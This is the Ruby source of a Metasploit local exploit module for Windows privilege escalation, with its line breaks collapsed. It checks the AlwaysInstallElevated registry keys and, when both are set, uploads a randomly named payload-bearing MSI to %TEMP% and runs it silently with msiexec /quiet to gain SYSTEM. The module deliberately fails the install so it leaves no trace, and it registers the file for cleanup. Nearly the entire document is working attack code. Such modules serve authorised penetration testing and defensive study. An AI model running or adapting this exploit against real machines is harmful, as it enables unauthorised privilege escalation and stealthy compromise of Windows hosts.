## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Windows::Registry def initialize(info={}) super(update_info(info, { 'Name' => 'Windows AlwaysInstallElevated MSI', 'Description' => %q{ This module checks the AlwaysInstallElevated registry keys which dictates if .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM). The generated .MSI file has an embedded executable which is extracted and run by the installer. After execution the .MSI file intentionally fails installation (by calling some invalid VBS) to prevent it being registered on the system. By running this with the /quiet argument the error will not be seen by the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell ', 'Parvez Anwar' # discovery?/inspiration ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'process', 'MSI::UAC' => true }, 'Targets' => [ [ 'Windows', { } ], ], 'References' => [ [ 'URL', 'http://www.greyhathacker.net/?p=185' ], [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ], [ 'URL', 'http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html'] ], 'DisclosureDate'=> 'Mar 18 2010', 'DefaultTarget' => 0 })) register_advanced_options([ OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]), OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true]) ], self.class) end def check install_elevated = "AlwaysInstallElevated" installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer" hkcu = "HKEY_CURRENT_USER\\#{installer}" hklm = "HKEY_LOCAL_MACHINE\\#{installer}" local_machine_value = registry_getvaldata(hklm,install_elevated) if local_machine_value.nil? print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.") return Msf::Exploit::CheckCode::Safe elsif local_machine_value == 0 print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.") return Msf::Exploit::CheckCode::Safe else print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.") current_user_value = registry_getvaldata(hkcu,install_elevated) end if current_user_value.nil? print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.") return Msf::Exploit::CheckCode::Safe elsif current_user_value == 0 print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Safe else print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Vulnerable end end def exploit return unless check == Msf::Exploit::CheckCode::Vulnerable msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi" msi_source = generate_payload_msi # Upload MSI msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip print_status("Uploading the MSI to #{msi_destination} ...") write_file(msi_destination, msi_source) register_file_for_cleanup(msi_destination) if datastore['LOG_FILE'].nil? logging = "" else logging = "/l* #{datastore['LOG_FILE']} " end if datastore['QUIET'] quiet = "/quiet " else quiet = "" end cmd = "msiexec.exe #{logging}#{quiet}/package #{msi_destination}" print_status("Executing MSI...") vprint_status("Executing: #{cmd}") begin result = cmd_exec(cmd) rescue Rex::TimeoutError vprint_status("Execution timed out.") end vprint_status("MSI command-line feedback: #{result}") end end